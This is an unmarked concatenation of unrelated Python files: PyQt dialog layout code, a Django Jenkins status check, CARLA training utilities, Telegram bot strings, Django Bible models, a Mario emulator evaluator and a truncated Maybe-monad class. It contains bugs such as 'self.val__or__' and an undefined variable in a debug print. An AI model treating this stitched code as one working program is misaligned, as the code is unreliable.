self.verticalLayout_8.addLayout(self.horizontalLayout_12) self.verticalLayout_11.addWidget(self.asset_info_groupBox_2) self.tabWidget.addTab(self.shots_tab, "") self.verticalLayout_5.addWidget(self.tabWidget) self.horizontalLayout_8 = QtGui.QHBoxLayout() self.horizontalLayout_8.setObjectName("horizontalLayout_8") self.thumbnail_graphicsView = QtGui.QGraphicsView(self.verticalWidget) sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.thumbnail_graphicsView.sizePolicy().hasHeightForWidth()) self.thumbnail_graphicsView.setSizePolicy(sizePolicy) self.thumbnail_graphicsView.setMinimumSize(QtCore.QSize(320, 180)) self.thumbnail_graphicsView.setMaximumSize(QtCore.QSize(320, 180)) self.thumbnail_graphicsView.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff) self.thumbnail_graphicsView.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff) brush = QtGui.QBrush(QtGui.QColor(0, 0, 0)) brush.setStyle(QtCore.Qt.SolidPattern) self.thumbnail_graphicsView.setBackgroundBrush(brush) self.thumbnail_graphicsView.setInteractive(False) self.thumbnail_graphicsView.setRenderHints(QtGui.QPainter.Antialiasing|QtGui.QPainter.HighQualityAntialiasing|QtGui.QPainter.SmoothPixmapTransform|QtGui.QPainter.TextAntialiasing) self.thumbnail_graphicsView.setObjectName("thumbnail_graphicsView") self.horizontalLayout_8.addWidget(self.thumbnail_graphicsView) self.verticalLayout_5.addLayout(self.horizontalLayout_8) self.horizontalLayout_16 = QtGui.QHBoxLayout() self.horizontalLayout_16.setContentsMargins(-1, -1, -1, 10) self.horizontalLayout_16.setObjectName("horizontalLayout_16") spacerItem4 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout_16.addItem(spacerItem4) self.upload_thumbnail_pushButton = QtGui.QPushButton(self.verticalWidget) self.upload_thumbnail_pushButton.setObjectName("upload_thumbnail_pushButton") self.horizontalLayout_16.addWidget(self.upload_thumbnail_pushButton) self.verticalLayout_5.addLayout(self.horizontalLayout_16) self.horizontalLayout_14.addLayout(self.verticalLayout_5) self.line_2 = QtGui.QFrame(self.verticalWidget) self.line_2.setFrameShape(QtGui.QFrame.VLine) self.line_2.setFrameShadow(QtGui.QFrame.Sunken) self.line_2.setObjectName("line_2") self.horizontalLayout_14.addWidget(self.line_2) 
self.new_version_groupBox = QtGui.QGroupBox(self.verticalWidget) self.new_version_groupBox.setObjectName("new_version_groupBox") self.verticalLayout_6 = QtGui.QVBoxLayout(self.new_version_groupBox) self.verticalLayout_6.setObjectName("verticalLayout_6") self.gridLayout_3 = QtGui.QGridLayout() self.gridLayout_3.setObjectName("gridLayout_3") self.takes_label = QtGui.QLabel(self.new_version_groupBox) self.takes_label.setMinimumSize(QtCore.QSize(35, 0)) font = QtGui.QFont() font.setWeight(50) font.setBold(False) self.takes_label.setFont(font) self.takes_label.setObjectName("takes_label") self.gridLayout_3.addWidget(self.takes_label, 1, 0, 1, 1) self.note_label = QtGui.QLabel(self.new_version_groupBox) self.note_label.setMinimumSize(QtCore.QSize(35, 0)) self.note_label.setObjectName("note_label") self.gridLayout_3.addWidget(self.note_label, 2, 0, 1, 1) self.version_types_label = QtGui.QLabel(self.new_version_groupBox) self.version_types_label.setMinimumSize(QtCore.QSize(35, 0)) font = QtGui.QFont() font.setWeight(50) font.setBold(False) self.version_types_label.setFont(font) self.version_types_label.setObjectName("version_types_label") self.gridLayout_3.addWidget(self.version_types_label, 0, 0, 1, 1) self.horizontalLayout_4 = QtGui.QHBoxLayout() self.horizontalLayout_4.setObjectName("horizontalLayout_4") self.version_types_listWidget = QtGui.QListWidget(self.new_version_groupBox) self.version_types_listWidget.setObjectName("version_types_listWidget") self.horizontalLayout_4.addWidget(self.version_types_listWidget) self.add_type_toolButton = QtGui.QToolButton(self.new_version_groupBox) self.add_type_toolButton.setObjectName("add_type_toolButton") self.horizontalLayout_4.addWidget(self.add_type_toolButton) self.gridLayout_3.addLayout(self.horizontalLayout_4, 0, 1, 1, 1) self.horizontalLayout_6 = QtGui.QHBoxLayout() self.horizontalLayout_6.setObjectName("horizontalLayout_6") self.takes_listWidget = QtGui.QListWidget(self.new_version_groupBox) self.takes_listWidget.setObjectName("takes_listWidget") self.horizontalLayout_6.addWidget(self.takes_listWidget) self.add_take_toolButton = QtGui.QToolButton(self.new_version_groupBox) self.add_take_toolButton.setObjectName("add_take_toolButton") self.horizontalLayout_6.addWidget(self.add_take_toolButton) self.gridLayout_3.addLayout(self.horizontalLayout_6, 1, 1, 1, 1) self.note_textEdit = QtGui.QTextEdit(self.new_version_groupBox) self.note_textEdit.setEnabled(True) self.note_textEdit.setTabChangesFocus(True) self.note_textEdit.setObjectName("note_textEdit") self.gridLayout_3.addWidget(self.note_textEdit, 2, 1, 1, 1) self.verticalLayout_6.addLayout(self.gridLayout_3) self.horizontalLayout_7 = QtGui.QHBoxLayout() self.horizontalLayout_7.setObjectName("horizontalLayout_7") self.status_label = QtGui.QLabel(self.new_version_groupBox) self.status_label.setObjectName("status_label") self.horizontalLayout_7.addWidget(self.status_label) self.statuses_comboBox = QtGui.QComboBox(self.new_version_groupBox) self.statuses_comboBox.setObjectName("statuses_comboBox") self.horizontalLayout_7.addWidget(self.statuses_comboBox) spacerItem5 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout_7.addItem(spacerItem5) self.publish_checkBox = QtGui.QCheckBox(self.new_version_groupBox) self.publish_checkBox.setObjectName("publish_checkBox") self.horizontalLayout_7.addWidget(self.publish_checkBox) self.verticalLayout_6.addLayout(self.horizontalLayout_7) self.horizontalLayout_17 = QtGui.QHBoxLayout() 
self.horizontalLayout_17.setObjectName("horizontalLayout_17") spacerItem6 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout_17.addItem(spacerItem6) self.update_paths_checkBox = QtGui.QCheckBox(self.new_version_groupBox) self.update_paths_checkBox.setChecked(True) self.update_paths_checkBox.setObjectName("update_paths_checkBox") self.horizontalLayout_17.addWidget(self.update_paths_checkBox) self.verticalLayout_6.addLayout(self.horizontalLayout_17) self.horizontalLayout_2 = QtGui.QHBoxLayout() self.horizontalLayout_2.setObjectName("horizontalLayout_2") spacerItem7 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout_2.addItem(spacerItem7) self.export_as_pushButton = QtGui.QPushButton(self.new_version_groupBox) self.export_as_pushButton.setObjectName("export_as_pushButton") self.horizontalLayout_2.addWidget(self.export_as_pushButton) self.save_as_pushButton = QtGui.QPushButton(self.new_version_groupBox) self.save_as_pushButton.setDefault(True) self.save_as_pushButton.setObjectName("save_as_pushButton") self.horizontalLayout_2.addWidget(self.save_as_pushButton) self.verticalLayout_6.addLayout(self.horizontalLayout_2) self.horizontalLayout_14.addWidget(self.new_version_groupBox) self.line = QtGui.QFrame(self.verticalWidget) self.line.setFrameShape(QtGui.QFrame.VLine) self.line.setFrameShadow(QtGui.QFrame.Sunken) self.line.setObjectName("line") self.horizontalLayout_14.addWidget(self.line) self.previous_versions_groupBox = QtGui.QGroupBox(self.verticalWidget) self.previous_versions_groupBox.setObjectName("previous_versions_groupBox") self.verticalLayout_7 = QtGui.QVBoxLayout(self.previous_versions_groupBox) self.verticalLayout_7.setObjectName("verticalLayout_7") self.horizontalLayout_10 = QtGui.QHBoxLayout() self.horizontalLayout_10.setObjectName("horizontalLayout_10") self.show_published_only_checkBox = QtGui.QCheckBox(self.previous_versions_groupBox) self.show_published_only_checkBox.setObjectName("show_published_only_checkBox") self.horizontalLayout_10.addWidget(self.show_published_only_checkBox) spacerItem8 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout_10.addItem(spacerItem8) self.show_only_label = QtGui.QLabel(self.previous_versions_groupBox) self.show_only_label.setObjectName("show_only_label") self.horizontalLayout_10.addWidget(self.show_only_label) self.version_count_spinBox = QtGui.QSpinBox(self.previous_versions_groupBox) self.version_count_spinBox.setMaximum(999999) self.version_count_spinBox.setProperty("value", 16) self.version_count_spinBox.setObjectName("version_count_spinBox") self.horizontalLayout_10.addWidget(self.version_count_spinBox) self.verticalLayout_7.addLayout(self.horizontalLayout_10) self.previous_versions_tableWidget = QtGui.QTableWidget(self.previous_versions_groupBox) self.previous_versions_tableWidget.setEditTriggers(QtGui.QAbstractItemView.NoEditTriggers) self.previous_versions_tableWidget.setAlternatingRowColors(True) self.previous_versions_tableWidget.setSelectionMode(QtGui.QAbstractItemView.SingleSelection) self.previous_versions_tableWidget.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows) self.previous_versions_tableWidget.setShowGrid(False) self.previous_versions_tableWidget.setColumnCount(6) self.previous_versions_tableWidget.setObjectName("previous_versions_tableWidget") self.previous_versions_tableWidget.setColumnCount(6) self.previous_versions_tableWidget.setRowCount(0) item = 
QtGui.QTableWidgetItem() self.previous_versions_tableWidget.setHorizontalHeaderItem(0, item) item = QtGui.QTableWidgetItem() self.previous_versions_tableWidget.setHorizontalHeaderItem(1, item) item = QtGui.QTableWidgetItem() self.previous_versions_tableWidget.setHorizontalHeaderItem(2, item) item = QtGui.QTableWidgetItem() self.previous_versions_tableWidget.setHorizontalHeaderItem(3, item) item = QtGui.QTableWidgetItem() self.previous_versions_tableWidget.setHorizontalHeaderItem(4, item) item = QtGui.QTableWidgetItem() self.previous_versions_tableWidget.setHorizontalHeaderItem(5, item) self.previous_versions_tableWidget.horizontalHeader().setStretchLastSection(True) self.previous_versions_tableWidget.verticalHeader().setStretchLastSection(False) self.verticalLayout_7.addWidget(self.previous_versions_tableWidget) self.horizontalLayout_5 = QtGui.QHBoxLayout() self.horizontalLayout_5.setObjectName("horizontalLayout_5") spacerItem9 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum) self.horizontalLayout_5.addItem(spacerItem9) self.chose_pushButton = QtGui.QPushButton(self.previous_versions_groupBox) self.chose_pushButton.setObjectName("chose_pushButton") self.horizontalLayout_5.addWidget(self.chose_pushButton) self.open_pushButton = QtGui.QPushButton(self.previous_versions_groupBox) self.open_pushButton.setObjectName("open_pushButton") self.horizontalLayout_5.addWidget(self.open_pushButton) self.reference_pushButton = QtGui.QPushButton(self.previous_versions_groupBox) self.reference_pushButton.setObjectName("reference_pushButton") self.horizontalLayout_5.addWidget(self.reference_pushButton) self.import_pushButton = QtGui.QPushButton(self.previous_versions_groupBox) self.import_pushButton.setObjectName("import_pushButton") self.horizontalLayout_5.addWidget(self.import_pushButton) self.close_pushButton = QtGui.QPushButton(self.previous_versions_groupBox) self.close_pushButton.setStyleSheet("") self.close_pushButton.setDefault(False) self.close_pushButton.setFlat(False) self.close_pushButton.setObjectName("close_pushButton") self.horizontalLayout_5.addWidget(self.close_pushButton) self.verticalLayout_7.addLayout(self.horizontalLayout_5) self.horizontalLayout_14.addWidget(self.previous_versions_groupBox) self.horizontalLayout_14.setStretch(4, 1) self.verticalLayout.addLayout(self.horizontalLayout_14) self.horizontalLayout.addWidget(self.verticalWidget) self.retranslateUi(Dialog) self.tabWidget.setCurrentIndex(0) QtCore.QMetaObject.connectSlotsByName(Dialog) Dialog.setTabOrder(self.projects_comboBox, self.users_comboBox) Dialog.setTabOrder(self.users_comboBox, self.create_asset_pushButton) Dialog.setTabOrder(self.create_asset_pushButton, self.sequences_comboBox) Dialog.setTabOrder(self.sequences_comboBox, self.create_shot_pushButton) Dialog.setTabOrder(self.create_shot_pushButton, self.shots_listWidget) Dialog.setTabOrder(self.shots_listWidget, self.add_type_toolButton) Dialog.setTabOrder(self.add_type_toolButton, self.add_take_toolButton) Dialog.setTabOrder(self.add_take_toolButton, self.note_textEdit) Dialog.setTabOrder(self.note_textEdit, self.export_as_pushButton) Dialog.setTabOrder(self.export_as_pushButton, self.save_as_pushButton) Dialog.setTabOrder(self.save_as_pushButton, self.previous_versions_tableWidget) Dialog.setTabOrder(self.previous_versions_tableWidget, self.open_pushButton) Dialog.setTabOrder(self.open_pushButton, self.reference_pushButton) Dialog.setTabOrder(self.reference_pushButton, self.import_pushButton) def retranslateUi(self, Dialog): 
Dialog.setWindowTitle(QtGui.QApplication.translate("Dialog", "Version Creator - oyProjectManager", None, QtGui.QApplication.UnicodeUTF8)) self.projects_label.setText(QtGui.QApplication.translate("Dialog", "Project", None, QtGui.QApplication.UnicodeUTF8)) self.client_label.setText(QtGui.QApplication.translate("Dialog", "Client:", None, QtGui.QApplication.UnicodeUTF8)) self.client_name_label.setText(QtGui.QApplication.translate("Dialog", "TextLabel", None, QtGui.QApplication.UnicodeUTF8)) self.user_label.setText(QtGui.QApplication.translate("Dialog", "User", None, QtGui.QApplication.UnicodeUTF8)) self.asset_info_groupBox.setTitle(QtGui.QApplication.translate("Dialog", "Asset Information", None, QtGui.QApplication.UnicodeUTF8)) self.asset_name_label.setText(QtGui.QApplication.translate("Dialog", "Name", None, QtGui.QApplication.UnicodeUTF8)) self.create_asset_pushButton.setText(QtGui.QApplication.translate("Dialog", "Create New Asset", None, QtGui.QApplication.UnicodeUTF8)) self.assets_tableWidget.setToolTip(QtGui.QApplication.translate("Dialog", "
    Right click to
    • Rename Asset
    ", None, QtGui.QApplication.UnicodeUTF8)) self.assets_tableWidget.horizontalHeaderItem(0).setText(QtGui.QApplication.translate("Dialog", "Type", None, QtGui.QApplication.UnicodeUTF8)) self.assets_tableWidget.horizontalHeaderItem(1).setText(QtGui.QApplication.translate("Dialog", "Name", None, QtGui.QApplication.UnicodeUTF8)) self.tabWidget.setTabText(self.tabWidget.indexOf(self.assets_tab), QtGui.QApplication.translate("Dialog", "Assets", None, QtGui.QApplication.UnicodeUTF8)) self.sequences_label.setText(QtGui.QApplication.translate("Dialog", "Sequence", None, QtGui.QApplication.UnicodeUTF8)) self.asset_info_groupBox_2.setTitle(QtGui.QApplication.translate("Dialog", "Shot Information", None, QtGui.QApplication.UnicodeUTF8)) self.shot_name_label.setText(QtGui.QApplication.translate("Dialog", "Name", None, QtGui.QApplication.UnicodeUTF8)) self.create_shot_pushButton.setText(QtGui.QApplication.translate("Dialog", "Create New Shot", None, QtGui.QApplication.UnicodeUTF8)) self.frame_range_label.setText(QtGui.QApplication.translate("Dialog", "Range", None, QtGui.QApplication.UnicodeUTF8)) self.handles_label.setText(QtGui.QApplication.translate("Dialog", "Handles", None, QtGui.QApplication.UnicodeUTF8)) self.shot_info_update_pushButton.setText(QtGui.QApplication.translate("Dialog", "Update", None, QtGui.QApplication.UnicodeUTF8)) self.tabWidget.setTabText(self.tabWidget.indexOf(self.shots_tab), QtGui.QApplication.translate("Dialog", "Shots", None, QtGui.QApplication.UnicodeUTF8)) self.upload_thumbnail_pushButton.setText(QtGui.QApplication.translate("Dialog", "Upload Thumbnail...", None, QtGui.QApplication.UnicodeUTF8)) self.new_version_groupBox.setTitle(QtGui.QApplication.translate("Dialog", "New Version", None, QtGui.QApplication.UnicodeUTF8)) self.takes_label.setText(QtGui.QApplication.translate("Dialog", "Take", None, QtGui.QApplication.UnicodeUTF8)) self.note_label.setText(QtGui.QApplication.translate("Dialog", "Note", None, QtGui.QApplication.UnicodeUTF8)) self.version_types_label.setText(QtGui.QApplication.translate("Dialog", "Type", None, QtGui.QApplication.UnicodeUTF8)) self.add_type_toolButton.setText(QtGui.QApplication.translate("Dialog", "+", None, QtGui.QApplication.UnicodeUTF8)) self.add_take_toolButton.setText(QtGui.QApplication.translate("Dialog", "+", None, QtGui.QApplication.UnicodeUTF8)) self.note_textEdit.setHtml(QtGui.QApplication.translate("Dialog", "\n" "\n" "
    ", None, QtGui.QApplication.UnicodeUTF8)) self.status_label.setText(QtGui.QApplication.translate("Dialog", "Status", None, QtGui.QApplication.UnicodeUTF8)) self.publish_checkBox.setText(QtGui.QApplication.translate("Dialog", "Publish", None, QtGui.QApplication.UnicodeUTF8)) self.update_paths_checkBox.setText(QtGui.QApplication.translate("Dialog", "Update Paths", None, QtGui.QApplication.UnicodeUTF8)) self.export_as_pushButton.setText(QtGui.QApplication.translate("Dialog", "Export Selection As", None, QtGui.QApplication.UnicodeUTF8)) self.save_as_pushButton.setText(QtGui.QApplication.translate("Dialog", "Save As", None, QtGui.QApplication.UnicodeUTF8)) self.previous_versions_groupBox.setTitle(QtGui.QApplication.translate("Dialog", "Previous Versions", None, QtGui.QApplication.UnicodeUTF8)) self.show_published_only_checkBox.setText(QtGui.QApplication.translate("Dialog", "Show Published Only", None, QtGui.QApplication.UnicodeUTF8)) self.show_only_label.setText(QtGui.QApplication.translate("Dialog", "Show Only", None, QtGui.QApplication.UnicodeUTF8)) self.previous_versions_tableWidget.setToolTip(QtGui.QApplication.translate("Dialog", "
    Right click to:
    • Change Status
    • Browse Outputs

    Double click to:
    • Open
    ", None, QtGui.QApplication.UnicodeUTF8)) self.previous_versions_tableWidget.horizontalHeaderItem(0).setText(QtGui.QApplication.translate("Dialog", "Version", None, QtGui.QApplication.UnicodeUTF8)) self.previous_versions_tableWidget.horizontalHeaderItem(1).setText(QtGui.QApplication.translate("Dialog", "User", None, QtGui.QApplication.UnicodeUTF8)) self.previous_versions_tableWidget.horizontalHeaderItem(2).setText(QtGui.QApplication.translate("Dialog", "Status", None, QtGui.QApplication.UnicodeUTF8)) self.previous_versions_tableWidget.horizontalHeaderItem(3).setText(QtGui.QApplication.translate("Dialog", "File Size", None, QtGui.QApplication.UnicodeUTF8)) self.previous_versions_tableWidget.horizontalHeaderItem(4).setText(QtGui.QApplication.translate("Dialog", "Date", None, QtGui.QApplication.UnicodeUTF8)) self.previous_versions_tableWidget.horizontalHeaderItem(5).setText(QtGui.QApplication.translate("Dialog", "Note", None, QtGui.QApplication.UnicodeUTF8)) self.chose_pushButton.setText(QtGui.QApplication.translate("Dialog", "Choose", None, QtGui.QApplication.UnicodeUTF8)) self.open_pushButton.setText(QtGui.QApplication.translate("Dialog", "Open", None, QtGui.QApplication.UnicodeUTF8)) self.reference_pushButton.setText(QtGui.QApplication.translate("Dialog", "Reference", None, QtGui.QApplication.UnicodeUTF8)) self.import_pushButton.setText(QtGui.QApplication.translate("Dialog", "Import", None, QtGui.QApplication.UnicodeUTF8)) self.close_pushButton.setText(QtGui.QApplication.translate("Dialog", "Close", None, QtGui.QApplication.UnicodeUTF8)) import os from django.db import models from ..jenkins import get_job_status from .base import StatusCheck, StatusCheckResult class JenkinsStatusCheck(StatusCheck): jenkins_config = models.ForeignKey('JenkinsConfig') @property def check_category(self): return "Jenkins check" @property def failing_short_status(self): return 'Job failing on Jenkins' def _run(self): result = StatusCheckResult(status_check=self) try: status = get_job_status(self.jenkins_config, self.name) active = status['active'] result.job_number = status['job_number'] if status['status_code'] == 404: result.error = u'Job %s not found on Jenkins' % self.name result.succeeded = False return result elif status['status_code'] > 400: # Will fall through to next block raise Exception(u'returned %s' % status['status_code']) except Exception as e: # If something else goes wrong, we will *not* fail - otherwise # a lot of services seem to fail all at once. # Ugly to do it here but... 
result.error = u'Error fetching from Jenkins - %s' % e.message result.succeeded = True return result if not active: # We will fail if the job has been disabled result.error = u'Job "%s" disabled on Jenkins' % self.name result.succeeded = False else: if self.max_queued_build_time and status['blocked_build_time']: if status['blocked_build_time'] > self.max_queued_build_time * 60: result.succeeded = False result.error = u'Job "%s" has blocked build waiting for %ss (> %sm)' % ( self.name, int(status['blocked_build_time']), self.max_queued_build_time, ) result.job_number = status['queued_job_number'] else: result.succeeded = status['succeeded'] else: result.succeeded = status['succeeded'] if not status['succeeded']: message = u'Job "%s" failing on Jenkins (%s)' % (self.name, status['consecutive_failures']) if result.error: result.error += u'; %s' % message else: result.error = message result.raw_data = status return result def calculate_debounced_passing(self, recent_results, debounce=0): """ `debounce` is the number of previous job failures we need (not including this) to mark a search as passing or failing Returns: True if passing given debounce factor False if failing """ last_result = recent_results[0] return last_result.consecutive_failures <= debounce class JenkinsConfig(models.Model): name = models.CharField(max_length=30, blank=False) jenkins_api = models.CharField(max_length=2000, blank=False) jenkins_user = models.CharField(max_length=2000, blank=False) jenkins_pass = models.CharField(max_length=2000, blank=False) def __str__(self): return self.name def create_default_jenkins_config(): if not JenkinsConfig.objects.exists(): if os.environ.get("JENKINS_API"): JenkinsConfig.objects.create( name="Default Jenkins", jenkins_api=os.environ.get("JENKINS_API", "http://jenkins.example.com"), jenkins_user=os.environ.get("JENKINS_USER", ""), jenkins_pass=os.environ.get("JENKINS_PASS", ""), ) #!/usr/bin/env python # coding=utf-8 ''' Author: Date:Thu Nov 22 12:09:27 2018 Info: ''' import os import random import shutil import torch # original transformations # check: https://github.com/carla-simulator/imitation-learning/issues/1 # from imgaug import augmenters as iaa # st = lambda aug: iaa.Sometimes(0.4, aug) # oc = lambda aug: iaa.Sometimes(0.3, aug) # rl = lambda aug: iaa.Sometimes(0.09, aug) # seq = iaa.SomeOf((4, None), [ # # blur images with a sigma between 0 and 1.5 # rl(iaa.GaussianBlur((0, 1.5))), # # add gaussian noise to images # rl(iaa.AdditiveGaussianNoise( # loc=0, # scale=(0.0, 0.05), # per_channel=0.5)), # # randomly remove up to X% of the pixels # oc(iaa.Dropout((0.0, 0.10), per_channel=0.5)), # # randomly remove up to X% of the pixels # oc(iaa.CoarseDropout( # (0.0, 0.10), size_percent=(0.08, 0.2), per_channel=0.5)), # # change brightness of images (by -X to Y of original value) # oc(iaa.Add((-40, 40), per_channel=0.5)), # # change brightness of images (X-Y% of original value) # st(iaa.Multiply((0.10, 2.5), per_channel=0.2)), # # improve or worsen the contrast # rl(iaa.ContrastNormalization((0.5, 1.5), per_channel=0.5)), # # rl(iaa.Grayscale((0.0, 1))), # put grayscale # ], random_order=True) class TransWrapper(object): def __init__(self, seq): self.seq = seq def __call__(self, img): return self.seq.augment_image(img) class RandomTransWrapper(object): def __init__(self, seq, p=0.5): self.seq = seq self.p = p def __call__(self, img): if self.p < random.random(): return img return self.seq.augment_image(img) class AverageMeter(object): """Computes and stores the average and current 
value""" def __init__(self): self.reset() def reset(self): self.val = 0 self.avg = 0 self.sum = 0 self.count = 0 def update(self, val, n=1): self.val = val self.sum += val * n self.count += n self.avg = self.sum / self.count def save_checkpoint(state, id_, is_best, filename='checkpoint.pth'): torch.save(state, filename) if is_best: shutil.copyfile( filename, os.path.join("save_models", "{}_best.pth".format(id_)) ) # - coding: utf-8 - from datetime import datetime start = '''Hi FLowers !\n''' hlp = '''Good day! /help - show this help /links - useful links /faq_en - answers for common questions For the kitchen cleaning schedule check pinned message and #cleaning hashtag ''' links = '''Links Here: sit.org -- "SIT" ''' now = datetime.now() faq_en = ('There will be a FAQ', now ) clean_hashtag = '#cleaning' clean_headers = [ 'Clean the Kitchen, if you are not an a**hole \n' 'Cmon slow hands, Clean the Dirty Kitchen!\n', 'Dont Be Lazy and start cleaning! \n', 'Clean the kitchen!!!!! and be a man \n', ] clean_body = 'In the morning {}:\t{} and in the night {}\n' from django.db import models from managers import BookManager class Book(models.Model): """ Book of the Bible """ number = models.PositiveIntegerField(primary_key=True, unique=True, db_index=True) slug = models.SlugField(unique=True) name = models.CharField(max_length=64, db_index=True) is_new_testament = models.BooleanField() objects = BookManager() @models.permalink def get_absolute_url(self): """ Returns the absolute url """ return ('book_detail', [self.slug,]) def __unicode__(self): return self.name class Meta: ordering = ['number',] class Chapter(models.Model): """ Chapter of the Bible """ book = models.ForeignKey(Book, related_name='chapters') number = models.PositiveIntegerField(db_index=True) def __unicode__(self): return '%s %s' % (self.book.name, self.number) def get_next_chapter(self): try: return Chapter.objects.filter( book=self.book,number__gt=self.number).order_by( 'number')[0] except IndexError: return None def get_previous_chapter(self): try: return Chapter.objects.filter( book=self.book,number__lt=self.number).order_by( '-number')[0] except IndexError: return None @models.permalink def get_absolute_url(self): """ Returns the absolute url """ return ('chapter_detail', [self.book.slug, self.number]) class Meta: ordering = ['number',] unique_together=(('book','number',),) class Verse(models.Model): """ Bible Verse """ chapter = models.ForeignKey(Chapter, related_name='verses') number = models.PositiveIntegerField(db_index=True) text = models.TextField() class Meta: ordering = ['number'] unique_together=(('chapter','number'),) def __unicode__(self): return '%s %s:%s' % (self.chapter.book.name, self.chapter.number, self.number) def get_absolute_url(self): return '%s#%s' % (self.chapter.get_absolute_url(), self.number) import retro from cgp.cgp_model import Population, Genome from mario_emu.discretizer import SuperMarioDiscretizer from mario_emu.picture_processor import PictureProcessor class Emulator: def __init__(self): self.env = retro.make('SuperMarioBros-Nes') self.disc = SuperMarioDiscretizer(self.env) def _evaluate_genome(self, g: Genome, render: bool = False, debug=False) -> float: observation = self.env.reset() total_reward = 0.0 stuck_score = 0 for i in range(1, 10000): if render: self.env.render() ob_flat = PictureProcessor.process(observation) action = self.disc.action(g.evaluate(ob_flat).argmax()) observation, reward, done, info = self.env.step(action) total_reward += reward stuck_score += reward if total_reward < 
0: break if i % 100 == 0: if stuck_score <= 0: break stuck_score = 0 if done: break if debug: print("Genome {} got reward {}".format(p.list_genomes[i], p.list_scores[i])) return total_reward @staticmethod def eval_population(p: Population, render=False, debug=False): e = Emulator() for i in range(len(p.list_genomes)): if p.list_scores[i] is None: p.list_scores[i] = e._evaluate_genome(p.list_genomes[i], render, debug) @staticmethod def get_action_space_size(): return SuperMarioDiscretizer(retro.make('SuperMarioBros-Nes')).action_space.n def replace(s1,s2,n1,n2): f1=open(n1,"r") f2=open(n2,"w") a=f1.read() newtxt=a.replace(s1,s2) f2.write(newtxt) f1.close() f2.close() replace ("*","&","que19.txt","New.txt") __all__ = ['maybe'] class NoValueError(Exception): pass class Maybe: pass class Just(Maybe): class JustDelegator: def __init__(self, val): self.val = val def __getattr__(self, name): return maybe(getattr(self.val, name)) def __getitem__(self, item): try: return maybe(self.val[item]) except (KeyError, IndexError, TypeError): return nothing def __missing__(self, key): return maybe(self.val.__missing__(key)) def __setitem__(self, key, value): self.val.__setitem__(key, value) def __delitem__(self, key): self.val.__delitem__(key) def __repr__(self): return maybe(self.val.__repr__()) def __str__(self): return maybe(self.val.__str__()) def __bytes__(self): return maybe(self.val.__bytes__()) def __format__(self, format_spec): return maybe(self.val.__format__(format_spec)) def __lt__(self, other): return maybe(self.val.__lt__(other)) def __le__(self, other): return maybe(self.val.__le__(other)) def __eq__(self, other): return maybe(self.val.__eq__(other)) def __ne__(self, other): return maybe(self.val.__ne__(other)) def __gt__(self, other): return maybe(self.val.__gt__(other)) def __ge__(self, other): return maybe(self.val.__ge__(other)) def __hash__(self): return maybe(self.val.__hash__()) def __bool__(self): return maybe(self.val.__bool__()) def __dir__(self): return maybe(self.val.__dir__()) def __call__(self, *args, **kwargs): return maybe(self.val.__call__(*args, **kwargs)) def __len__(self): return maybe(self.val.__len__()) def __length_hint__(self): return maybe(self.val.__length_hint__()) def __iter__(self): return maybe(self.val.__iter__()) def __reversed__(self): return maybe(self.val.__reversed__()) def __contains__(self, item): return maybe(self.val.__contains__(item)) def __add__(self, other): return maybe(self.val.__add__(other)) def __sub__(self, other): return maybe(self.val.__sub__(other)) def __mul__(self, other): return maybe(self.val.__mul__(other)) def __matmul__(self, other): return maybe(self.val.__matmul__(other)) def __truediv__(self, other): return maybe(self.val.__truediv__(other)) def __floordiv__(self, other): return maybe(self.val.__floordiv__(other)) def __mod__(self, other): return maybe(self.val.__mod__(other)) def __divmod__(self, other): return maybe(self.val.__divmod__(other)) def __pow__(self, other, modulo=None): return maybe(self.val.__pow__(other, modulo)) def __lshift__(self, other): return maybe(self.val.__lshift__(other)) def __rshift__(self, other): return maybe(self.val.__rshift__(other)) def __and__(self, other): return maybe(self.val.__and__(other)) def __xor__(self, other): return maybe(self.val.__xor__(other)) def __or__(self, other): return maybe(self.val__or__(other)) def __radd__(self, other): return maybe(self.val.__radd__(other)) def __rsub__(self, other): return maybe(self.val.__rsub__(other)) def __rmul__(self, other): return 
maybe(self.val.__rmul__(other)) def __rmatmul__(self, other): return maybe(self.val.__rmatmul__(other)) def __rtruediv__(self, other): return maybe(self.val.__rtruediv__(other)) def __rfloordiv__(self, other): return maybe(self.val.__rfloordiv__(other)) def __rmod__(self, other): return maybe(self.val.__rmod__(other)) def __rdivmod__(self, other): return maybe(self.val__rdivmod__(other)) def __rpow__(self, other): return maybe(self.val.__rpow__(other)) def __rlshift__(self, other): return maybe(self.val.__rlshift__(other)) def __rrshift__(self, other): return maybe(self.val.__rrshift__(other)) def __rand__(self, other): return maybe(self.val.__rand__(other)) def __rxor__(self, other): return maybe(self.val.__rxor__(other)) def __ror__(self, other): return maybe(self.val.__ror__(other)) def __iadd__(self, other): self.val.__iadd__(other) def __isub__(self, other): self.val.__isub__(other) def __imul__(self, other): self.val.__imul__(other) def __imatmul__(self, other): self.val.__imatmul__(other) def __itruediv__(self, other): self.val.__itruediv__(other) def __ifloordiv__(self, other): self.val.__ifloordiv__(other) def __imod__(self, other): self.val.__imod__(other) def __ipow__(self, other, modulo=None): self.val.__ipow__(other, modulo) def __ilshift__(self, other): self.val.__ilshift__(other) def __irshift__(self, other): self.val.__irshift__(other) def __iand__(self, other): self.val.__iand__(other) def __ixor__(self, other): self.val.__ixor__(other) def __ior__(self, other): self.val.__ior__(other) def __neg__(self): return maybe(self.val.__neg__()) def __pos__(self): return maybe(self.val.__pos__()) def __abs__(self): return maybe(self.val.__abs__()) def __invert__(self): return maybe(self.val.__invert__()) def __complex__(self): return maybe(self.val.__complex__()) def __int__(self): return 